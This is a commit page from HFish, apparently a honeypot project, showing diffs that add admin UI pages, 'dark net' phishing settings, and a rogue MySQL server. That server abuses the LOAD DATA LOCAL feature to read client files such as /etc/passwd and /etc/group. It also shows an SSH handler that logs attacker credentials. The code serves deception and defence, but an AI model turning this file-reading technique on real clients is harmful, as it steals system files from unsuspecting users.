Skip to content

Commit

Permalink
~ 修复 Mysql 三次握手不主动关闭连接异常问题 100%
Browse files Browse the repository at this point in the history
~ 日记格式完善 70%
~ 暗网钓鱼支持 80%
~ UI 优化
~ 支持分页 50%
~ 支持筛选 50%
  • Loading branch information
sanjinhub committed Aug 8, 2019
1 parent 7163def commit 036ffad
Show file tree
Hide file tree
Showing 18 changed files with 782 additions and 71 deletions.
109 changes: 109 additions & 0 deletions admin/colony.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,109 @@
{{template "header"}}
<style>
.card-box {
padding: 0px;
}

.table {
width: 100%;
max-width: 100%;
margin-bottom: 0rem;
}

#tableList .td {
vertical-align: middle;
}

thead {
background: #f5f5f5;
}

.project {
font-weight: bold;
padding-left: 5px;
}

.fa-trash-o {
color: #f00;
cursor: pointer;
}

.info {
color: #039cfd;
cursor: pointer;
font-weight: bold;
}

.label {
line-height: 11px;
}

.lb_ssh {
background-color: #434556;
}

.lb_redis {
background-color: #e44242;
}

.lb_mysql {
background-color: #cabd23;
}

.pre {
background: #2c2c31;
color: #4fe21b;
padding: 10px;
border-bottom-left-radius: 5px;
border-bottom-right-radius: 5px;
}

.modal-body {
position: relative;
padding: 0px;
margin-bottom: -14px;
}

.modal-content {
border-bottom-left-radius: 6px;
border-bottom-right-radius: 6px;
}

.modal-header {
padding: 10px;
border-bottom: 1px solid #e5e5e5;
}

.modal-header .close {
margin-top: 0px;
}
</style>
<div class="row">
<div class="col-sm-12">
<h4 class="page-title">分布式集群</h4>
</div>

<div class="col-sm-12">
<div class="card-box table-responsive">
<table class="table table-hover">
<thead>
<tr>
<th width="10%">项目</th>
<th width="10%">来源 IP</th>
<th width="10%">信息</th>
<th width="10%">上钩时间</th>
<th width="1%">操作</th>
</tr>
</thead>
<tbody id="tableList">
<tr style="text-align: center;"><td style="line-height: 200px;font-size: 20px;color: #a9a9a9;" colspan="5">暂无数据</td></tr>
</tbody>
</table>
</div>
</div>
</div>

{{template "footer" }}
<script>

</script>
53 changes: 46 additions & 7 deletions admin/fish.html
Original file line number Diff line number Diff line change
Expand Up @@ -77,17 +77,48 @@
.modal-header .close {
margin-top: 0px;
}

.sos {
margin-bottom: 10px;
height: 100px;
}
</style>
<div class="row">
<div class="col-sm-12">
{{/*<div class="btn-group pull-right m-t-15">*/}}
{{/*<a type="button" class="btn btn-custom" href="#">导出 <span class="m-l-5"><i*/}}
{{/*class="zmdi zmdi-alarm-plus"></i></span>*/}}
{{/*</a>*/}}
{{/*</div>*/}}
{{/*<div class="btn-group pull-right m-t-15">*/}}
{{/*<a type="button" class="btn btn-custom" href="#">导出 <span class="m-l-5"><i*/}}
{{/*class="zmdi zmdi-alarm-plus"></i></span>*/}}
{{/*</a>*/}}
{{/*</div>*/}}
<h4 class="page-title">上钩列表</h4>
</div>

<div class="sos">
<div class="col-sm-2">
<select class="form-control" id="exampleSelect1" style="height: 34px;">
<option>请选择类型</option>
<option>2</option>
<option>3</option>
<option>4</option>
<option>5</option>
</select>
</div>
<div class="col-sm-2">
</div>
<div class="col-sm-2">
</div>
<div class="col-sm-2">
</div>
<div class="col-sm-4">
<div class="input-group">
<span class="input-group-addon"><i class="fa fa-search"></i></span>
<input type="text" class="form-control" id="so_text"
placeholder="请输入搜索内容">
</div><!-- input-group -->
</div>
</div>


<div class="col-sm-12">
<div class="card-box table-responsive">
<table class="table table-hover">
Expand Down Expand Up @@ -167,11 +198,15 @@ <h6 class="modal-title" id="myModalLabel">上钩信息</h6>
});
}

function init() {
function init(page) {
$.ajax({
type: "GET",
url: "/get/fish/list",
dataType: "json",
data: {
"page": page,
"pageSize": 10
},
success: function (e) {
if (e.code == 200) {
var data = e.data;
Expand Down Expand Up @@ -201,6 +236,10 @@ <h6 class="modal-title" id="myModalLabel">上钩信息</h6>
_h += '</tr>';
}

if (_h == "") {
_h = '<tr style="text-align: center;"><td style="line-height: 200px;font-size: 20px;color: #a9a9a9;" colspan="5">暂无数据</td></tr>'
}

$("#tableList").html(_h);
} else {

Expand All @@ -212,5 +251,5 @@ <h6 class="modal-title" id="myModalLabel">上钩信息</h6>
}


init();
init(10);
</script>
3 changes: 3 additions & 0 deletions admin/header.html
Original file line number Diff line number Diff line change
Expand Up @@ -34,6 +34,9 @@
<li>
<a href="/fish"><i class="fa fa-user-secret "></i> <span> 上钩列表 </span> </a>
</li>
<li>
<a href="/colony"><i class="fa fa-cloud"></i> <span> 分布式集群 </span> </a>
</li>
<li>
<a href="/mail"><i class="zmdi zmdi-email icotop3"></i> <span> 邮箱群发 </span> </a>
</li>
Expand Down
13 changes: 10 additions & 3 deletions config.ini
Original file line number Diff line number Diff line change
Expand Up @@ -15,15 +15,22 @@ template = github/html # WEB 模板路径
static = github/static # WEB 静态文件路径 注意:必须存在两个目录,html 文件 和静态文件 不能平级
url = / # WEB 访问目录,默认 / 可更改成 index.html index.asp index.php

[dark_net]
status = 0 # 是否启动 暗网 1 启动 0 关闭, 启动 API 后 方可上报结果
addr = 0.0.0.0:9002 # 暗网 WEB 启动地址
template = github/html # 暗网 WEB 模板路径
static = github/static # 暗网 WEB 静态文件路径 注意:必须存在两个目录,html 文件 和静态文件 不能平级
url = / # 暗网 WEB 访问目录,默认 / 可更改成 index.html index.asp index.php

[ssh]
status = 0 # 是否启动 SSH 1 启动 0 关闭
status = 1 # 是否启动 SSH 1 启动 0 关闭
addr = 0.0.0.0:22 # SSH 服务端地址 注意端口冲突,请先关闭服务器 openssh 服务 或 修改端口

[redis]
status = 0 # 是否启动 Redis 1 启动 0 关闭
status = 1 # 是否启动 Redis 1 启动 0 关闭
addr = 0.0.0.0:6379 # Redis 服务端地址 注意端口冲突

[mysql]
status = 0 # 是否启动 Mysql 1 启动 0 关闭
status = 1 # 是否启动 Mysql 1 启动 0 关闭
addr = 0.0.0.0:3306 # Mysql 服务端地址 注意端口冲突
files = /etc/passwd,/etc/group # Mysql 服务端读取客户端任意文件; 多写逗号分隔,会随机取
66 changes: 36 additions & 30 deletions core/protocol/mysql/mysql.go
Original file line number Diff line number Diff line change
Expand Up @@ -3,13 +3,13 @@ package mysql
import (
"bytes"
"encoding/binary"
"fmt"
"log"
"net"
"syscall"
"strings"
"HFish/error"
"HFish/core/report"
"HFish/utils/try"
"HFish/utils/log"
)

//读取文件时每次读取的字节数
Expand Down Expand Up @@ -37,8 +37,6 @@ var fileNames []string
var recordClient = make(map[string]int)

func Start(addr string, files string) {
fmt.Println("mysql启动...")

// 启动 Mysql 服务端
serverAddr, _ := net.ResolveTCPAddr("tcp", addr)
listener, _ := net.ListenTCP("tcp", serverAddr)
Expand Down Expand Up @@ -75,35 +73,44 @@ func connectionClientHandler(conn net.Conn) {

arr := strings.Split(connFrom, ":")
id := report.ReportMysql(arr[0], connFrom+" 已经连接")
log.Pr("Mysql", arr[0], "已经连接")

var ibuf = make([]byte, bufLength)
//第一个包
_, err := conn.Write(GreetingData)
error.Check(err, "")
try.Try(func() {
var ibuf = make([]byte, bufLength)

//第二个包
_, err = conn.Read(ibuf[0: bufLength-1])
//第一个包
_, err := conn.Write(GreetingData)
error.Check(err, "")

//判断是否有Can Use LOAD DATA LOCAL标志,如果有才支持读取文件
if (uint8(ibuf[4]) & uint8(128)) == 0 {
_ = conn.Close()
log.Println("The client not support LOAD DATA LOCAL")
return
}
//第三个包
_, err = conn.Write(OkData)
//第二个包
_, err = conn.Read(ibuf[0: bufLength-1])

//判断是否有Can Use LOAD DATA LOCAL标志,如果有才支持读取文件
if (uint8(ibuf[4]) & uint8(128)) == 0 {
_ = conn.Close()
return
}
//第三个包
_, err = conn.Write(OkData)

//第四个包
_, err = conn.Read(ibuf[0: bufLength-1])

//这里根据客户端连接的次数来选择读取文件列表里面的第几个文件
ip, _, _ := net.SplitHostPort(conn.RemoteAddr().String())
getFileData := []byte{byte(len(fileNames[recordClient[ip]]) + 1), 0x00, 0x00, 0x01, 0xfb}
getFileData = append(getFileData, fileNames[recordClient[ip]]...)

//第四个包
_, err = conn.Read(ibuf[0: bufLength-1])
//第五个包
_, err = conn.Write(getFileData)
getRequestContent(conn, id)

//这里根据客户端连接的次数来选择读取文件列表里面的第几个文件
ip, _, _ := net.SplitHostPort(conn.RemoteAddr().String())
getFileData := []byte{byte(len(fileNames[recordClient[ip]]) + 1), 0x00, 0x00, 0x01, 0xfb}
getFileData = append(getFileData, fileNames[recordClient[ip]]...)
}).Catch(func() {
log.Pr("Mysql", arr[0], "该客户端正在使用扫描器扫描")

//第五个包
_, err = conn.Write(getFileData)
getRequestContent(conn, id)
// 有扫描器扫描
report.ReportUpdateMysql(id, "&&该客户端正在使用扫描器扫描")
})
}

//获取客户端传来的文件数据
Expand All @@ -116,7 +123,6 @@ func getRequestContent(conn net.Conn, id int64) {

totalDataLength := int(binary.LittleEndian.Uint32(append(lengthBuf, 0)))
if totalDataLength == 0 {
log.Println("Get no file and closed connection.")
return
}
//然后丢掉1字节的序列号
Expand All @@ -128,7 +134,6 @@ func getRequestContent(conn net.Conn, id int64) {
length, err := conn.Read(ibuf)
switch err {
case nil:
log.Println("Get file and reading...")
//如果本次读取的内容长度+之前读取的内容长度大于文件内容总长度,则本次读取的文件内容只能留下一部分
if length+totalReadLength > totalDataLength {
length = totalDataLength - totalReadLength
Expand All @@ -144,7 +149,8 @@ func getRequestContent(conn net.Conn, id int64) {
case syscall.EAGAIN: // try again
continue
default:
log.Println("Closed connection: ", conn.RemoteAddr().String())
arr := strings.Split(conn.RemoteAddr().String(), ":")
log.Pr("Mysql", arr[0], "已经关闭连接")
return
}
}
Expand Down
2 changes: 2 additions & 0 deletions core/protocol/redis/redis.go
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,7 @@ import (
"strconv"
"HFish/utils/try"
"HFish/core/report"
"HFish/utils/log"
)

var kvData map[string]string
Expand All @@ -26,6 +27,7 @@ func Start(addr string) {
}
arr := strings.Split(conn.RemoteAddr().String(), ":")
id := report.ReportRedis(arr[0], conn.RemoteAddr().String()+" 已经连接")
log.Pr("Redis", arr[0], "已经连接")

go handleConnection(conn, id)
}
Expand Down
4 changes: 4 additions & 0 deletions core/protocol/ssh/ssh.go
Original file line number Diff line number Diff line change
Expand Up @@ -4,6 +4,7 @@ import (
"github.com/gliderlabs/ssh"
"HFish/core/report"
"strings"
"HFish/utils/log"
)

func Start(addr string) {
Expand All @@ -12,6 +13,9 @@ func Start(addr string) {
info := s.User() + "&&" + password

arr := strings.Split(s.RemoteAddr().String(), ":")

log.Pr("SSH", arr[0], "已经连接")

report.ReportSSH(arr[0], info)

return false // false 代表 账号密码 不正确
Expand Down
Binary file modified db/hfish.db
Binary file not shown.
Loading

0 comments on commit 036ffad

Please sign in to comment.